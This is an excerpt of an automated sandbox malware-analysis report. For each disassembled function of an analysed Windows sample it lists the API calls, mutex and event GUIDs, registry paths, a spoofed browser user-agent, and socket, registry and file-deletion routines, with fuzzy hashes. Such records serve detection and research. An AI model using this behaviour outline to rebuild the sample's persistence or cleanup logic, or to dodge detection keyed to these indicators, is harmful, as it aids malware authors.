                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Delete$AllocFileInfoLocale___crt__snwprintfwnsprintf$CloseOpenValue_memsetclosesocketsetsockoptshutdown
                                                                            • String ID: $#$.DLL$.DLL$.DLL$SOFTWARE\%s$SOFTWARE\%s${70F925A9-13A6-49C0-913B-C685A8E9B495}
                                                                            • API String ID: 421061684-337882337
                                                                            • Opcode ID: c80ac3685a73b0dd5b5aeaa35fc593cbdffca093f0af0ec89882dab8e1076fab
                                                                            • Instruction ID: dc4311d7b9e7d9859e233a425adb5ae6dad368d527bf46a4fe5e8fef46055587
                                                                            • Opcode Fuzzy Hash: c80ac3685a73b0dd5b5aeaa35fc593cbdffca093f0af0ec89882dab8e1076fab
                                                                            • Instruction Fuzzy Hash: 14D106B1D002299BEB24DF64CC49BADB7B4BB44304F10C5D9E649A7281DFB59A84DF90
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007C9811
                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 007C982C
                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 007C983B
                                                                            • _memset.LIBCMT ref: 007C985D
                                                                            • __snwprintf.LIBCMT ref: 007C987B
                                                                            • RegGetValueW.ADVAPI32(80000001,?,00000000,00000008,00000000,00000000,00000000), ref: 007C98AA
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007C98DA
                                                                            • RegGetValueW.ADVAPI32(80000001,?,00000000,00000008,00000000,00000000,00000000), ref: 007C9915
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocLocalValue$__snwprintf_memsetlstrcpy
                                                                            • String ID: .DLL$SOFTWARE\%s${70F925A9-13A6-49C0-913B-C685A8E9B495}
                                                                            • API String ID: 2286648044-1817445416
                                                                            • Opcode ID: d0f4e972542e5cfd7dfb286a3ec30c8864ea50cab031c8fc780f9ce4372efd89
                                                                            • Instruction ID: e3caca8645a3dca1ea574e00d25e69627606c7b5b580b93cdfe18fd3fb8960dc
                                                                            • Opcode Fuzzy Hash: d0f4e972542e5cfd7dfb286a3ec30c8864ea50cab031c8fc780f9ce4372efd89
                                                                            • Instruction Fuzzy Hash: 56D1FBB5A00218DFDB64DB64DC8DFAAB7B5BF88300F10859CE609AB250DB759E84CF51
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007C8D3E
                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 007C8D59
                                                                            • StrStrIW.SHLWAPI(00000000,.DLL), ref: 007C8D68
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 007C8D8D
                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 007C8DA6
                                                                            • LocalAlloc.KERNEL32(00000040,000000FF), ref: 007C8DBF
                                                                            • ReadFile.KERNEL32(000000FF,00000000,000000FF,?,00000000), ref: 007C8DE4
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007C8DFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$AllocLocal$CloseCreateHandleReadSizelstrcpy
                                                                            • String ID: .DLL
                                                                            • API String ID: 2968648924-899428287
                                                                            • Opcode ID: c0e25cefb4a77ec5788c1e75dc6e52e0c53ca5f980bb6d10b79654408d1c1c71
                                                                            • Instruction ID: 77ffecaba29a792b2656476712da5543be285452ce6c2c1fa54e5d4a52d8a0d3
                                                                            • Opcode Fuzzy Hash: c0e25cefb4a77ec5788c1e75dc6e52e0c53ca5f980bb6d10b79654408d1c1c71
                                                                            • Instruction Fuzzy Hash: D3C11971E00209EBDB54DFE4D889FAEBBB5BF88300F14851DE615BB290DB799981CB50
                                                                            APIs
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{CCEFB138-B038-41E1-AC53-171A4E58AB6A}), ref: 007DBB32
                                                                            • LoadLibraryW.KERNEL32(KERNEL32.DLL), ref: 007DBB42
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007DBB59
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 007DBB7D
                                                                            • ExitProcess.KERNEL32 ref: 007DBE75
                                                                              • Part of subcall function 007D6BE0: SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6BFC
                                                                              • Part of subcall function 007D6BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6C14
                                                                              • Part of subcall function 007D6BE0: CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6C2A
                                                                              • Part of subcall function 007D6BE0: SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6C3F
                                                                              • Part of subcall function 007D6BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6C57
                                                                              • Part of subcall function 007D6BE0: CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6C6D
                                                                              • Part of subcall function 007D6BE0: CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6C82
                                                                              • Part of subcall function 007D6BE0: SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6C98
                                                                              • Part of subcall function 007D6BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6CB0
                                                                              • Part of subcall function 007D6BE0: CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6CC5
                                                                              • Part of subcall function 007D6BE0: SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6CDB
                                                                              • Part of subcall function 007D6BE0: WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6CF3
                                                                              • Part of subcall function 007D6BE0: CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6D08
                                                                              • Part of subcall function 007D6BE0: CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6D1E
                                                                            • CloseHandle.KERNEL32(000002EC), ref: 007DBE8F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DBE9F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DBEC6
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DBED6
                                                                            • ExitProcess.KERNEL32 ref: 007DBEE7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait$ExitLocalProcess$AllocFileFreeLibraryLoadModuleMutexNameOpen
                                                                            • String ID: KERNEL32.DLL${04D458D6-7C6C-445F-AEAD-313D698F1F0A}${C3397568-8840-4085-8F6E-BC07C085BB3B}${C55632B1-A307-4128-9468-89792C176C2F}${CCEFB138-B038-41E1-AC53-171A4E58AB6A}${F95B00D0-572A-45B1-BD9B-5DB7078A4AC4}
                                                                            • API String ID: 2953619224-2614908309
                                                                            • Opcode ID: 41564a3b3aa5c55c76abd38740294373d9a64cf94b8d118291ec28c79de70ba2
                                                                            • Instruction ID: 8a7a1613407958904ab541db48b69c038ed27c5092612ff5bc1b09be334de313
                                                                            • Opcode Fuzzy Hash: 41564a3b3aa5c55c76abd38740294373d9a64cf94b8d118291ec28c79de70ba2
                                                                            • Instruction Fuzzy Hash: A7A16070A04308EFDF24AFA1DC89BAD7BB1FB44715F21451AF511A6390DBBC8884DB15
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007C7B13
                                                                            • _memset.LIBCMT ref: 007C7BA4
                                                                            • __snwprintf.LIBCMT ref: 007C7BC2
                                                                            • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 007C7BEC
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007C7C80
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 007C8096
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C80AC
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C80C2
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C80D8
                                                                            • shutdown.WS2_32(?,00000002), ref: 007C80F7
                                                                            • closesocket.WS2_32(?), ref: 007C8101
                                                                              • Part of subcall function 007E0CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
                                                                              • Part of subcall function 007E0950: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E096D
                                                                            Strings
                                                                            • {70F925A9-13A6-49C0-913B-C685A8E9B495}, xrefs: 007C7BAC
                                                                            • SOFTWARE\%s, xrefs: 007C7BB1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$InfoLocale___crt$AllocCloseCreate__snwprintf_memsetclosesocketsetsockoptshutdown
                                                                            • String ID: SOFTWARE\%s${70F925A9-13A6-49C0-913B-C685A8E9B495}
                                                                            • API String ID: 1227969885-90677415
                                                                            • Opcode ID: 31c76f6ae7df673f57c97773d27135982f5f2dc2522bae7bab36a300c39ecbad
                                                                            • Instruction ID: d169ea9c86dac97756c57bd2dbb6aa770c1b7686bee323c8ea9e03afd59630f3
                                                                            • Opcode Fuzzy Hash: 31c76f6ae7df673f57c97773d27135982f5f2dc2522bae7bab36a300c39ecbad
                                                                            • Instruction Fuzzy Hash: 3C024B71900219DBEB64CB64CC49FADB7B8BB88310F10869CF619A7291DB785EC5CF61
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E117D
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E11A0
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007E11B8
                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000001,00000004), ref: 007E126B
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007E1281
                                                                            • LocalAlloc.KERNEL32(00000040,00000004), ref: 007E1298
                                                                            • CreateThread.KERNEL32(00000000,00000000,007E1580,00000000,00000000,00000000), ref: 007E12C4
                                                                            • GetTickCount.KERNEL32 ref: 007E12E1
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E1309
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E1323
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E133E
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E13D7
                                                                            • closesocket.WS2_32(00000000), ref: 007E13E1
                                                                            • SetEvent.KERNEL32(00000000), ref: 007E13F2
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007E13FE
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1419
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E1430
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E143A
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E1453
                                                                            • closesocket.WS2_32(00000000), ref: 007E145D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1469
                                                                            • ExitProcess.KERNEL32 ref: 007E14B0
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007E14C6
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E14D7
                                                                            • SetEvent.KERNEL32(00000000), ref: 007E14E8
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007E14F4
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1504
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E151B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1534
                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 007E154E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1558
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1568
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1572
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$CloseHandle$Event$CreateLocalclosesocketshutdown$AllocCountExitFreeMutexProcessReleaseThreadTicksetsockopt
                                                                            • String ID:
                                                                            • API String ID: 3704011687-0
                                                                            • Opcode ID: dbbde087f6a851058167e80a840cc8ff14cbbc755b7b5d5e72b99b527ccc18cc
                                                                            • Instruction ID: e4ba470a664a7966c476eb19a99b9006c6872060d8c6e249d69fea40e2bfcab6
                                                                            • Opcode Fuzzy Hash: dbbde087f6a851058167e80a840cc8ff14cbbc755b7b5d5e72b99b527ccc18cc
                                                                            • Instruction Fuzzy Hash: 52713B71A01344EBDB14DFA5EC8EBAE7776BB48301F608518F602A62E1CB7C9941CF54
                                                                            APIs
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{16B194B1-19CC-4C52-92E2-1BFAC8473D8C}), ref: 007D2F3F
                                                                            • SetEvent.KERNEL32(00000000), ref: 007D2F5B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D2F68
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{8931AB7A-A1AA-4E58-80EA-2B1247F36722}), ref: 007D2F84
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007D2FA2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D2FAF
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007D2FC5
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D2FDA
                                                                            • __snwprintf.LIBCMT ref: 007D301F
                                                                            • lstrlenW.KERNEL32(00000000), ref: 007D302E
                                                                            • _memset.LIBCMT ref: 007D306A
                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 007D30A5
                                                                            • SHFileOperationW.SHELL32(?), ref: 007D30C2
                                                                            • Sleep.KERNEL32(000003E8), ref: 007D30E2
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D30F1
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D30FE
                                                                            • wnsprintfW.SHLWAPI ref: 007D312E
                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000000,00000000), ref: 007D3147
                                                                            Strings
                                                                            • {8931AB7A-A1AA-4E58-80EA-2B1247F36722}, xrefs: 007D2F78
                                                                            • %s\%s, xrefs: 007D300E
                                                                            • {C2479B37-C2B3-42BB-AA73-3313D48DF29B}, xrefs: 007D3002
                                                                            • {E83187BB-7111-445B-879E-34A213BF001C}, xrefs: 007D3118
                                                                            • Software\%s, xrefs: 007D311D
                                                                            • {16B194B1-19CC-4C52-92E2-1BFAC8473D8C}, xrefs: 007D2F33
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseEventFileFreeHandleLocalOpen$AllocAttributesDeleteFolderKnownMutexObjectOperationPathSingleSleepTaskWait__snwprintf_memsetlstrlenwnsprintf
                                                                            • String ID: %s\%s$Software\%s${16B194B1-19CC-4C52-92E2-1BFAC8473D8C}${8931AB7A-A1AA-4E58-80EA-2B1247F36722}${C2479B37-C2B3-42BB-AA73-3313D48DF29B}${E83187BB-7111-445B-879E-34A213BF001C}
                                                                            • API String ID: 1130256755-521004812
                                                                            • Opcode ID: c4bfe062a50d825d0f06f3aa84cfb50d4e6f8fea7462b506d5f35c3adb2fcb4b
                                                                            • Instruction ID: b7034097fd1f6d1e37a7d4cb4dd37dcb59a6d1ab5ff9a494d2c5d7a6b7d45bce
                                                                            • Opcode Fuzzy Hash: c4bfe062a50d825d0f06f3aa84cfb50d4e6f8fea7462b506d5f35c3adb2fcb4b
                                                                            • Instruction Fuzzy Hash: CA516C70E092589BDB609B60DC49BA97775FF88701F0085DAF50DB6280DBBC6A84CF51
                                                                            APIs
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007DB654
                                                                            • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 007DB678
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DB928
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB93D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB95D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007DB97D
                                                                            Strings
                                                                            • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 007DB6C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$Create$EventFreeLocalMutex
                                                                            • String ID: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                                            • API String ID: 4059844998-3593534564
                                                                            • Opcode ID: f7da211a911537d477fa7c52f4b30371aa75d8280875074115a10685f0a30255
                                                                            • Instruction ID: 36d92581dc02f8681fd90cdd400ba28ac3a1486a6ced06164f1b921d22e047fd
                                                                            • Opcode Fuzzy Hash: f7da211a911537d477fa7c52f4b30371aa75d8280875074115a10685f0a30255
                                                                            • Instruction Fuzzy Hash: C5917B72A00304EFDB24DF60ED89BA977B9BB88300F50855AF645973A1DB785E40CF66
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,007E6189), ref: 007E830F
                                                                            • __mtterm.LIBCMT ref: 007E831B
                                                                              • Part of subcall function 007E8054: DecodePointer.KERNEL32(00000004,007E847D,?,007E6189), ref: 007E8065
                                                                              • Part of subcall function 007E8054: TlsFree.KERNEL32(00000003,007E847D,?,007E6189), ref: 007E807F
                                                                              • Part of subcall function 007E8054: DeleteCriticalSection.KERNEL32(00000000,00000000,77375810,?,007E847D,?,007E6189), ref: 007EC612
                                                                              • Part of subcall function 007E8054: _free.LIBCMT ref: 007EC615
                                                                              • Part of subcall function 007E8054: DeleteCriticalSection.KERNEL32(00000003,77375810,?,007E847D,?,007E6189), ref: 007EC63C
                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 007E8331
                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 007E833E
                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 007E834B
                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 007E8358
                                                                            • TlsAlloc.KERNEL32(?,007E6189), ref: 007E83A8
                                                                            • TlsSetValue.KERNEL32(00000000,?,007E6189), ref: 007E83C3
                                                                            • __init_pointers.LIBCMT ref: 007E83CD
                                                                            • EncodePointer.KERNEL32(?,007E6189), ref: 007E83DE
                                                                            • EncodePointer.KERNEL32(?,007E6189), ref: 007E83EB
                                                                            • EncodePointer.KERNEL32(?,007E6189), ref: 007E83F8
                                                                            • EncodePointer.KERNEL32(?,007E6189), ref: 007E8405
                                                                            • DecodePointer.KERNEL32(007E81D8,?,007E6189), ref: 007E8426
                                                                            • __calloc_crt.LIBCMT ref: 007E843B
                                                                            • DecodePointer.KERNEL32(00000000,?,007E6189), ref: 007E8455
                                                                            • GetCurrentThreadId.KERNEL32 ref: 007E8467
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                            • API String ID: 3698121176-3819984048
                                                                            • Opcode ID: bb9da50b7b4b9aee8251270ce083ef82f6dc0f3d498797fee6dc39c6b44d075a
                                                                            • Instruction ID: ec6352c671c451a6ebb4f7aa5d8e822a869ad667cf5cf9d7042447fd0d7be4b2
                                                                            • Opcode Fuzzy Hash: bb9da50b7b4b9aee8251270ce083ef82f6dc0f3d498797fee6dc39c6b44d075a
                                                                            • Instruction Fuzzy Hash: 8931A671907345DBC7916F77BC0A52A3FA0FBA97607104A1AE92C932B0EF398442CF95
                                                                            APIs
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
